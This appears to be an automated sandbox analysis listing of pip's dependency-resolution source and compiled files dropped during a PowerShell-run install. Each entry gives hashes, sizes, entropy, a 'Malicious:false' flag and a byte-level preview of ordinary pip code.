                              Preview:........=.Cf.].............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5..d.d.l6m7Z7..d.d.l8m9Z9....e.jt..................e;........Z<e.e=e.e'....f.....Z>..d.d.e.d.e.e?e?e?f.....d.e@d.d.f.d...ZA..G.d...d.e,........ZBy.) ay...Dependency Resolution..The dependency resolution in pip is performed as follows:..for top-level requirements:. a. only one spec allowed per project, regardless of conflicts or not.. otherwise a "double requirement" exception is raised. b. they override sub-dependency requirements..for sub-dependencies. a. "first found, wins" (where the order is breadth first)......N)...defaultdict)...chain)...DefaultDict..Iterable..List..Optional..Set..Tuple)...specifiers)...Requirement)...WheelCache).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):24025
                              Entropy (8bit):4.301715348590666
                              Encrypted:false
                              SSDEEP:384:4RHF/Uag88q0Dd/GZuutMCAK1iG/yNbdwXMm5QUl0:+lUag8/0DdegGRyNbdwcm5Qb
                              MD5:9CD40F9B233AE35B269FE58D69CEBCB5
                              SHA1:28A0853F100C0B441801B09796CEB2C032FFBC7A
                              SHA-256:5E4DB88D0EB61AF2EBE0C73B22337FAA23BCF2AA740489B35663C8173F502CE1
                              SHA-512:522A333673276A6101870E195F18D6B29B50F4B51B841DFA33422A77EF60805E0BE76CF3D2E7E611C75660C58ACD11072E6239063DCD041C009DC646B0967D3D
                              Malicious:false
                              Preview:"""Dependency Resolution..The dependency resolution in pip is performed as follows:..for top-level requirements:. a. only one spec allowed per project, regardless of conflicts or not.. otherwise a "double requirement" exception is raised. b. they override sub-dependency requirements..for sub-dependencies. a. "first found, wins" (where the order is breadth first)."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import logging.import sys.from collections import defaultdict.from itertools import chain.from typing import DefaultDict, Iterable, List, Optional, Set, Tuple..from pip._vendor.packaging import specifiers.from pip._vendor.packaging.requirements import Requirement..from pip._internal.cache import WheelCache.from pip._internal.exceptions import (. BestVersionAlreadyInstalled,. DistributionNotFound,. HashError,. HashErrors,. InstallationError,. NoneMetadataError,. UnsupportedPythonVersion,.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):217
                              Entropy (8bit):4.833915723226737
                              Encrypted:false
                              SSDEEP:6:rH/cl/VneWn23d6oAreKAyECOTE6Iaatgem/l:T0tVefImbc8EjaatHmt
                              MD5:624CD27ACD598D21B40165371D9B344C
                              SHA1:76631A1AECC0D69EFFD0834DEAEFB613C87CB892
                              SHA-256:AF3F57E763627DAC683D00E022EE8B4DFB87C44132EE1C739BF80270BAD1BE98
                              SHA-512:0E2A43249FC5957048122BF736D78B6B26F30F4FD2689BD72DD6EC65CE4A0C804B8519BD88993EA784A9DB3151964D2DC2166C658DDEEBE0D7D7535882DA5B32
                              Malicious:false
                              Preview:........=.Cf................................y.).N..r..........xC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/__init__.py..<module>r........s.........r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8346
                              Entropy (8bit):5.131650861481336
                              Encrypted:false
                              SSDEEP:192:/4kTVWkbAo1Vziyd+O6f3N62MtejbpaWGecYfaQhZ0KYWc:/jWkUo/dy3Mm7GeFfLhe3
                              MD5:8A958BD8B8C7C324B1BAD1C0CCA343E6
                              SHA1:6CB2304BD5F88FF2C2C0661F4E7D431E210EEF55
                              SHA-256:BBB196906A15AFBD049F601529AB3285FB859A18EED7F2720AD5480F4F593665
                              SHA-512:EA275493790EC077D67DBFC49C7BED0ABE87DD840BB218E568FF52E36CA6516CA21E5C8C5F32E1D277A4876F602977D3B4B0E44052995E5F9B792E1C519739E7
                              Malicious:false
                              Preview:........=.Cf5...............................d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.d.....e.e.....f.....Z.e.e.e.f.....Z.d.e.d.e.e.....d.e.f.d...Z...G.d...d.........Z...G.d...d.........Z.d.e.d.d.d.e.f.d...Z...G.d...d.........Z.y.)......)...FrozenSet..Iterable..Optional..Tuple..Union)...SpecifierSet)...NormalizedName)...LegacyVersion..Version)...Link..links_equivalent)...InstallRequirement)...Hashes..Candidate..project..extras..returnc.....................N.....|.s.|.S.d.j...................t.........|.................}.|...d.|...d...S.).N..,..[..])...join..sorted).r....r......extras_exprs.... .tC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/base.py..format_namer........s/.................(.(.6.&.>..*.K....Y.a...}.A..&..&.....c..........................e.Z.d.Z.d.e.d.e.d.e.e.....d.d.f.d...Z.e.d.d...........Z.e.d.e.d.d.f.d...........Z.d.e.f.d...Z.d.e.d.d.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):30407
                              Entropy (8bit):5.14075482732838
                              Encrypted:false
                              SSDEEP:768:kBCEJR0v0wf4hOVCycZaMIF5++Ay8kMTB:kkR4hOgZYrFx8Ht
                              MD5:CCE7D857153B945B240ACB7F7FFA75E9
                              SHA1:659D0B93F010E8D31746874801409558639B08E9
                              SHA-256:9E76116F8EA0B0783D07E1197A2B4A7A6BC6C8A4F8B22E29779F4ADB08672F5F
                              SHA-512:FBF39A858FB8C07DFCBDF2A0DD04D57A1D8CEC40F087AAD4047617F4B21C9443B60E450816F549AED1A623B9E0D958FFD8242C5902E64F2484A9EFD167BF0FD5
                              Malicious:false
                              Preview:........=.Cf<R..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&m'Z'm(Z(..e.r.d.d.l)m*Z*....e.jV..................e,........Z-e.d.....Z...e.e.d.........Z/d.e%d.e.e.....f.d...Z0d.e.d.e.d.e.f.d...Z1d.e.d.e.d.e.f.d...Z2d.e.d.e.d.e.f.d...Z3..G.d...d.e%........Z4..G.d...d.e4........Z5..G.d...d e4........Z6..G.d!..d"e%........Z7..G.d#..d$e%........Z8..G.d%..d&e%........Z9y.)'.....N)...TYPE_CHECKING..Any..FrozenSet..Iterable..Optional..Tuple..Union..cast)...NormalizedName..canonicalize_name)...Version)...HashError..InstallationSubprocessError..MetadataInconsistent)...BaseDistribution)...Link..links_equivalent)...Wheel)...install_req_from_editable..install_req_from_line)...InstallRequirement)...direct_url_from_link)...normalize_version_info.....)...Candidate..CandidateVersion..Requirement..format_name)...Fa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):32123
                              Entropy (8bit):5.499697155846887
                              Encrypted:false
                              SSDEEP:768:Qol4gJlDBsTzD4rvoP/Gn5pkiA6585mhSI99DY:QS1DonQ5pkiz8zIk
                              MD5:DD86F7BE9A9145CC97461BB6F8788935
                              SHA1:B7CB9122B6CC6C51302F018F8762619DF2F48D4E
                              SHA-256:9E413D07884604195FE039D45E6C03400C398C287B5D14829BCD80909220DE21
                              SHA-512:88C9A471F09AD42B53A4B9B074FBC8E3C38CD5B03B00FA154DC1823E291B88884916472757C200DAA887C3F748B1603A1AD8732CF721D02C7C53DD7E0C94AE63
                              Malicious:false
                              Preview:........=.Cf$~........................R.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>..d.d.l?m@Z@mAZAmBZBmCZC..d.d.lDmEZEmFZFmGZGmHZHmIZImJZJmKZK..d.d.lLmMZMmNZN..d.d.lOmPZPmQZQmRZRmSZSmTZT..e.r.d.d.l.mUZU....G.d...d.eU........ZV..e.j...................eX........ZY..e.d.........ZZe.e*eZf.....Z[..G.d...d.e.........Z\..G.d ..d!........Z]y.)".....N)...TYPE_CHECKING..Dict..FrozenSet..Iterable..Iterator..List..Mapping..NamedTuple..Optional..Sequence..Set..Tuple..TypeVar..cast)...InvalidRequirement)...SpecifierSet)...NormalizedName..canonicalize_name)...ResolutionImpossible)...CacheEntry..WheelCache)...DistributionNotFound..InstallationError..MetadataInconsistent..UnsupportedPythonVersion..Unsupporte
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6217
                              Entropy (8bit):5.530119785914288
                              Encrypted:false
                              SSDEEP:96:0zr4lqxqBYYHPpgUa1WM8Z+7vI32Xs3VkeezQkgSgjt+7L7NE987i7Mu7vh7kht8:JH3xoqyvI3lTRkLnNE9uMj9Gv9u
                              MD5:F92B8067E3117CBFE4FA49E11324B686
                              SHA1:884F850FD51C562F306F305FD2D52E907AA231E0
                              SHA-256:ABAAB35333D44BBB951D8A3731A70916D080A573BF136716803D8AD27A8B300F
                              SHA-512:C303DB57EA06E240F4B119677450ED704EB6FB9C39BAC26274B29386A291D651DFA520EE841E1A623507B53FEA917BF29A73EE6A182929AA6BC99110797456D0
                              Malicious:false
                              Preview:........=.CfI...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.g.e.e.....f.....f.....Z.e.r.e.e.....Z.n.e.Z.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z...G.d...d.e.........Z.y.).a....Utilities to lazily create and visit candidates found...Creating and visiting a candidate is a *very* costly operation. It involves.fetching, extracting, potentially building modules from source, and verifying.distribution metadata. It is therefore crucial for performance to keep.everything here lazy all the way down, so we only touch candidates that we.absolutely need, and not "download the world" when we only need one version of.something.......N)...Sequence)...TYPE_CHECKING..Any..Callable..Iterator..Optional..Set..Tuple)..._BaseVersion.....)...Candidate..infos..returnc................#....|...K.....t.................}.|.D.])..\...}.}.|.|.v.r.....|.........}.|.....|.......|.j.............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):10387
                              Entropy (8bit):5.6431964553348735
                              Encrypted:false
                              SSDEEP:192:nDUGNeHLeTUx0E5TJ6yIXxOUyoZmQMW/U8zTdVAhs+RlLq6mPVB5W:nQk2p/gXUoZdLTc4dS
                              MD5:5064206C8BAB571147F2D01DA0FC87A3
                              SHA1:F4B84356E4880089A44E8D3C86EDF0F16C988869
                              SHA-256:72487FDBCBC8EE88039CEEB3FA0D5D1A292229D8CD963D068D07260AC49FAB4F
                              SHA-512:BF591DE2FAB00943D9E11C262613B46466911DCEFC8CE0230153DBAD0F620D847497C339D84B53C67CE87BB44EA68323C58370AB2E8917AF60FFEC04BBAFC492
                              Malicious:false
                              Preview:........=.Cf`&..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...e.e.e.f.....Z.e.e.e.e.f.....Z.n.e.Z...e.d.........Z...e.d.........Z.d.e.e.e.f.....d.e.d.e.d.e.e.e.f.....f.d...Z...G.d...d.e.........Z.y.)......N)...TYPE_CHECKING..Dict..Iterable..Iterator..Mapping..Sequence..TypeVar..Union)...AbstractProvider.....)...Candidate..Constraint..Requirement)...REQUIRES_PYTHON_IDENTIFIER)...Factory)...Preference)...RequirementInformation..D..V..mapping..identifier..default..returnc.....................X.....|.|.v.r.|.|.....S.|.j...................d.........\...}.}.}.|.r.|.|.v.r.|.|.....S.|.S.).ai...Get item from a package name lookup mapping with a resolver identifier... This extra logic is needed when the target mapping is keyed by package. name, which cannot be directly looked up with an identifier (which may. contain requested extras). Additional logic is added to al
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4944
                              Entropy (8bit):5.275930810013513
                              Encrypted:false
                              SSDEEP:96:JZAc2byCgey8Tl7eodtBzCLs2rhlnpqIkAzqzpybHQioc+Qc:9xePl6od+fsXgwioX
                              MD5:D8D985A92DD7F21F6671316CCF21B82A
                              SHA1:25E72368B0C2CBDC513C2BEEC204FCC7DDDF0F69
                              SHA-256:4E2561BC8AA107545FAE640DD9F7F7F4DB4715BA45ADED1F42FD9C0BF5AC852B
                              SHA-512:F6218AC2B43DC6D5291863FB31165DF4F1987D8D0E319D6F73B5ACAA5CDD84FF21A81DE8A9900C806673E5228EA4DD99FC401E0612A00065F5019E2C20674049
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...defaultdict)...getLogger)...Any..DefaultDict)...BaseReporter.....)...Candidate..Requirementc.....................(.....e.Z.d.Z.d.d...Z.d.e.d.e.d.d.f.d...Z.y.)...PipReporter..returnNc.....................B.....t.........t.................|._.........d.d.d.d...|._.........y.).Nz.pip is looking at multiple versions of {package_name} to determine which version is compatible with other requirements. This could take a while.z.pip is still looking at multiple versions of {package_name} to determine which version is compatible with other requirements. This could take a while.z.This is taking longer than usual. You might need to provide the dependency resolver with stricter constraints to reduce runtime. See https://pip.pypa.io/warnings/backtracking for guidance. If you want to abort this run, press Ctrl + C.).r.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11438
                              Entropy (8bit):4.865034867107575
                              Encrypted:false
                              SSDEEP:96:8zgdpKTt3IUkVkjMm79c69AiXEmDNJdojSj6CcHp+0yRxwraWixUi9zuv/gbkVnY:8cAD9tAON5ToA7nwrgxpIqSVUmQ
                              MD5:6A386E8FFE0A9A956545A3053EF0D6FB
                              SHA1:E534906E23007A83DEB35666D0C858C888DC6DC8
                              SHA-256:CFE74729791FC38C9F2BDE10B3D560DE45F1CE54325D04172C11C255B78E08B8
                              SHA-512:616C67A19D7CD55B25D537E31542007FDEB4201D87B525A1F698CA349925BA0C651ADF428328B11357A17F3429CE0BCD09098D6F6E1F5672B50E19247DBF4E85
                              Malicious:false
                              Preview:........=.Cf@..............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.)......)...SpecifierSet)...NormalizedName..canonicalize_name)...install_req_drop_extras)...InstallRequirement.....)...Candidate..CandidateLookup..Requirement..format_namec..........................e.Z.d.Z.d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.e.d.e.f.d...........Z.e.d.e.f.d...........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.y.)...ExplicitRequirement..candidate..returnNc...........................|.|._.........y...N..r........selfr....s.... .|C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/resolution/resolvelib/requirements.py..__init__z.ExplicitRequirement.__init__....s........".........c.....................,.....t.........|.j...........................S.r....)...strr......r....s.... r......__str__z.ExplicitRequir
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12360
                              Entropy (8bit):5.538903816941455
                              Encrypted:false
                              SSDEEP:192:UQdzXGFSCGh4QfIdUJ3MbYJbYcliYxGh314LCLpifHCJU1Pf:VLwU4QwCYYxvliYIx1BpifHCJMPf
                              MD5:D0DAB0D93EE63E712918DF54221C6D03
                              SHA1:C9577E690FE6E9971CD947CA202E3B37089E1D81
                              SHA-256:8B4B27925E301711E90136BE4E62BCF537063C68D53AEFCD0AFE9BCA278C8A88
                              SHA-512:503454268B5AEDEEEF549D050EB84258CFC8983A529A3996E3F5D8806C92F28037A964635CD04A481A884BD0F73DF3253A36088122457CB326872E7102248053
                              Malicious:false
                              Preview:........=.Cf01..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-..d.d.l.m/Z/..e.r.d.d.l0m1Z2..e2e-e,e3f.....Z1..e.jh..................e5........Z6..G.d...d.e"........Z.d.d.d.e.e3....d.e.e.e3....e7f.....f.d...Z8d.e.e3e.f.....d.e.e.e3....e7f.....d.e.e7e3f.....f.d...Z9y.)......N)...TYPE_CHECKING..Dict..List..Optional..Set..Tuple..cast....canonicalize_name)...BaseReporter..ResolutionImpossible)...Resolver)...DirectedGraph)...WheelCache)...PackageFinder)...RequirementPreparer)...install_req_extend_extras)...InstallRequirement)...RequirementSet)...BaseResolver..InstallRequirementProvider)...PipProvider)...PipDebuggingReporter..PipReporter)...get_requirement.....)...Candidate..Requirement)...Factory)...Resultc............................e.Z.d.Z.h.d...Z..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5173
                              Entropy (8bit):4.645730040215515
                              Encrypted:false
                              SSDEEP:96:GKgz+pKea9Gmpnhf5iSyYdTrVBgk29G7edvdssT6F4NgkQbpKDgkUq1us57IxCXO:OzWwGmpnhf5iSyYdTrVmcenjOu0+baqU
                              MD5:0F2D852DECDCE2078DCA1F3144E0242E
                              SHA1:15B46DD6A5E1D47D7D12E4F5C7FC7DCC10A468FC
                              SHA-256:8E0E423A61CB86604828E47EE2CA5D243DE3C942D86B505DB2A881BB66099C9E
                              SHA-512:757B7C156AAC53F65B29995FD00F1A0A4A7D22E5DA679667AEF1DDFF230ED830537A07B1799BCC103C8E1852183FCF611FB9292CFC9E7A32E4ED6B979A090926
                              Malicious:false
                              Preview:from typing import FrozenSet, Iterable, Optional, Tuple, Union..from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName.from pip._vendor.packaging.version import LegacyVersion, Version..from pip._internal.models.link import Link, links_equivalent.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.hashes import Hashes..CandidateLookup = Tuple[Optional["Candidate"], Optional[InstallRequirement]].CandidateVersion = Union[LegacyVersion, Version]...def format_name(project: NormalizedName, extras: FrozenSet[NormalizedName]) -> str:. if not extras:. return project. extras_expr = ",".join(sorted(extras)). return f"{project}[{extras_expr}]"...class Constraint:. def __init__(. self, specifier: SpecifierSet, hashes: Hashes, links: FrozenSet[Link]. ) -> None:. self.specifier = specifier. self.hashes = hashes. self.links = links.. @classmethod. def empt
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):21052
                              Entropy (8bit):4.512854307945884
                              Encrypted:false
                              SSDEEP:192:UVLfjKLbZ4P7blhTn7AT70VWPPIyBTrMM/cRVBZSPGt48G1LGQvdLsJBBMaz6DwB:Uw54Pnr7i70OVTkvN48yDdYV6wFNWWJf
                              MD5:CD398AAF4525485F7972AB17AEE950C8
                              SHA1:2BB311BBD7F8883F2F818863093863106280D462
                              SHA-256:D7D2A2F753E8F8C4B10649C621F38691A5A415D3B39CDD16FE72AFEE32F6F0BD
                              SHA-512:4E9731E8DB9AB343F7F228744C4F3F8975432EFAC8697F348C4EFDE92A2560E5152DD38C858FAC15DB430046E7ED6043EA5C7F3F2C9713C2A1A59A1CB6F4FEC9
                              Malicious:false
                              Preview:import logging.import sys.from typing import TYPE_CHECKING, Any, FrozenSet, Iterable, Optional, Tuple, Union, cast..from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import (. HashError,. InstallationSubprocessError,. MetadataInconsistent,.).from pip._internal.metadata import BaseDistribution.from pip._internal.models.link import Link, links_equivalent.from pip._internal.models.wheel import Wheel.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.direct_url_helpers import direct_url_from_link.from pip._internal.utils.misc import normalize_version_info..from .base import Candidate, CandidateVersion, Requirement, format_name..if TYPE_CHECKING:. from .factory import Factory..logger = logging.getLogger(__name__)..BaseCandidate = Union[.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):32292
                              Entropy (8bit):4.255055335176978
                              Encrypted:false
                              SSDEEP:384:68JR56HreGl3X0Cp7IiSCqaSbOJZHqtWSZ9pkqhYACZ1Y7X3vH24k:6H/p7I67KnLOGX3vH2
                              MD5:3F53DA705335C523B60CE428CA6DF3D6
                              SHA1:4F32A162518B6317878FAC1FB01B8647F715D940
                              SHA-256:BEAAA4FA18DC85D85287059575E5B6FC0FB965B94B844FE70BFBF7321CF84AF7
                              SHA-512:0E6E78F6F6A28FDF87DFA162A7E7919C8E17DAE539210E381B10139D4A582DA45BF10B6DBA00C0B0B8A4C287BCC395D71B1191B3FE217370CA685EF7B02BD4B3
                              Malicious:false
                              Preview:import contextlib.import functools.import logging.from typing import (. TYPE_CHECKING,. Dict,. FrozenSet,. Iterable,. Iterator,. List,. Mapping,. NamedTuple,. Optional,. Sequence,. Set,. Tuple,. TypeVar,. cast,.)..from pip._vendor.packaging.requirements import InvalidRequirement.from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.resolvelib import ResolutionImpossible..from pip._internal.cache import CacheEntry, WheelCache.from pip._internal.exceptions import (. DistributionNotFound,. InstallationError,. MetadataInconsistent,. UnsupportedPythonVersion,. UnsupportedWheel,.).from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_default_environment.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.operations.prepare im
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5705
                              Entropy (8bit):4.505216978095506
                              Encrypted:false
                              SSDEEP:96:Ur4l0ct8kYS/bHXBRln6cYzjAfMuMcM8Z+79jAfLuMcXs3VkeezJrW4jAfrc3gwR:Bfz3yeTxcQ7ZQ7x
                              MD5:D849F61FDD0534F82B95C28C80FBCC53
                              SHA1:6E872AD864F5642639E2E2C625C0005269D472BD
                              SHA-256:86F2F71E86BD55A628FAA10E664062D88AB0DB9D540F13F3FAE30755A5A62E91
                              SHA-512:6FD6D88439B8E00BC0F1198B7F971EEC248EF5870016CB1ED1B52FDC376202E217D6B21E904A774ABEBFF481862A2ECE8FE087EDF7C55CB0D70AC48F997E1D0D
                              Malicious:false
                              Preview:"""Utilities to lazily create and visit candidates found...Creating and visiting a candidate is a *very* costly operation. It involves.fetching, extracting, potentially building modules from source, and verifying.distribution metadata. It is therefore crucial for performance to keep.everything here lazy all the way down, so we only touch candidates that we.absolutely need, and not "download the world" when we only need one version of.something.."""..import functools.from collections.abc import Sequence.from typing import TYPE_CHECKING, Any, Callable, Iterator, Optional, Set, Tuple..from pip._vendor.packaging.version import _BaseVersion..from .base import Candidate..IndexCandidateInfo = Tuple[_BaseVersion, Callable[[], Optional[Candidate]]]..if TYPE_CHECKING:. SequenceCandidate = Sequence[Candidate].else:. # For compatibility: Python before 3.9 does not support using [] on the. # Sequence class.. #. # >>> from collections.abc import Sequence. # >>> Sequence[str]. #
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):9824
                              Entropy (8bit):4.433835668397495
                              Encrypted:false
                              SSDEEP:192:vsVpuo0z0KlrlTlWD/7UrXQSgj6WyoZmQbEKzl6lCEPCACW:v2ujyD/7HSgmJoZFECZACW
                              MD5:273EFD245287D4EC323A02EF05E983F7
                              SHA1:76C0F41ACA7E9F66646B58EC015C160EF21E4A36
                              SHA-256:E2DDB78AF8EBBAA33A84A057D4AA46893B7E3381C68517199C62D5D1CD352BB5
                              SHA-512:E99EC829AF19E4E0B29B16C5B9B9F4856A9578EA6239AE07A328A59F09DA490E6E9B130D0BD704BD87F23B6883BC22B86EA63E722B9A6B324A7D9503A2106342
                              Malicious:false
                              Preview:import collections.import math.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. Iterator,. Mapping,. Sequence,. TypeVar,. Union,.)..from pip._vendor.resolvelib.providers import AbstractProvider..from .base import Candidate, Constraint, Requirement.from .candidates import REQUIRES_PYTHON_IDENTIFIER.from .factory import Factory..if TYPE_CHECKING:. from pip._vendor.resolvelib.providers import Preference. from pip._vendor.resolvelib.resolvers import RequirementInformation.. PreferenceInformation = RequirementInformation[Requirement, Candidate].. _ProviderBase = AbstractProvider[Requirement, Candidate, str].else:. _ProviderBase = AbstractProvider..# Notes on the relationship between the provider, the factory, and the.# candidate and requirement classes..#.# The provider is a direct implementation of the resolvelib class. Its role.# is to deliver the API that resolvelib expects..#.# Rather than work with completely abstract "requirement" and "can
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3100
                              Entropy (8bit):4.472154934320961
                              Encrypted:false
                              SSDEEP:96:/PodCLtMjcwsHohgChCUG06SZh6HohRzorohcu:noIEb
                              MD5:669B50941F26A76BD2F0110DA53829E4
                              SHA1:E297B2B1FE62E181946180F25D71BEC8D7F2EF90
                              SHA-256:6059BD850BF3E031426E365E153439EA14F3DC073E9830671E478D455BCC1CB6
                              SHA-512:E0F46E49ABBC8E4BF295D2D7C2DCEDFD87588806E56B75EC111F2DDAAD0B237DA888A383B1004F771985F3C1AE9FA4B89072CE0A5D7341A7CA3F5B7254062D3F
                              Malicious:false
                              Preview:from collections import defaultdict.from logging import getLogger.from typing import Any, DefaultDict..from pip._vendor.resolvelib.reporters import BaseReporter..from .base import Candidate, Requirement..logger = getLogger(__name__)...class PipReporter(BaseReporter):. def __init__(self) -> None:. self.reject_count_by_package: DefaultDict[str, int] = defaultdict(int).. self._messages_at_reject_count = {. 1: (. "pip is looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.". ),. 8: (. "pip is still looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.". ),. 13: (. "This is taking longer than usual. You might need to provide ".
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5696
                              Entropy (8bit):4.5531229702159175
                              Encrypted:false
                              SSDEEP:96:k6ipKl5ohERsedlikilikBrbpKboohw6eabbpKpoh5S8pqRdvOlxwukbqm7hkL4j:AX0kkaYwe0MYjsnVW
                              MD5:4E1972F212E51EF4A6C710CEF867B53D
                              SHA1:2D0AE87422662F0C8DA9367FC8DFC8D3237A1913
                              SHA-256:FA424E34FD168C37DD4EF040B36BD45CF8009CEC8D2011005D8E1BEF6A20B4F1
                              SHA-512:6010B5B7226CE8478E8AA8AC2E0CAED3C543E72E2D2C689CA655EC4FF5469B59FF7C7614302B595DB2BA541A46A9519B4E1D7B9F41E4D02E953E14782360485D
                              Malicious:false
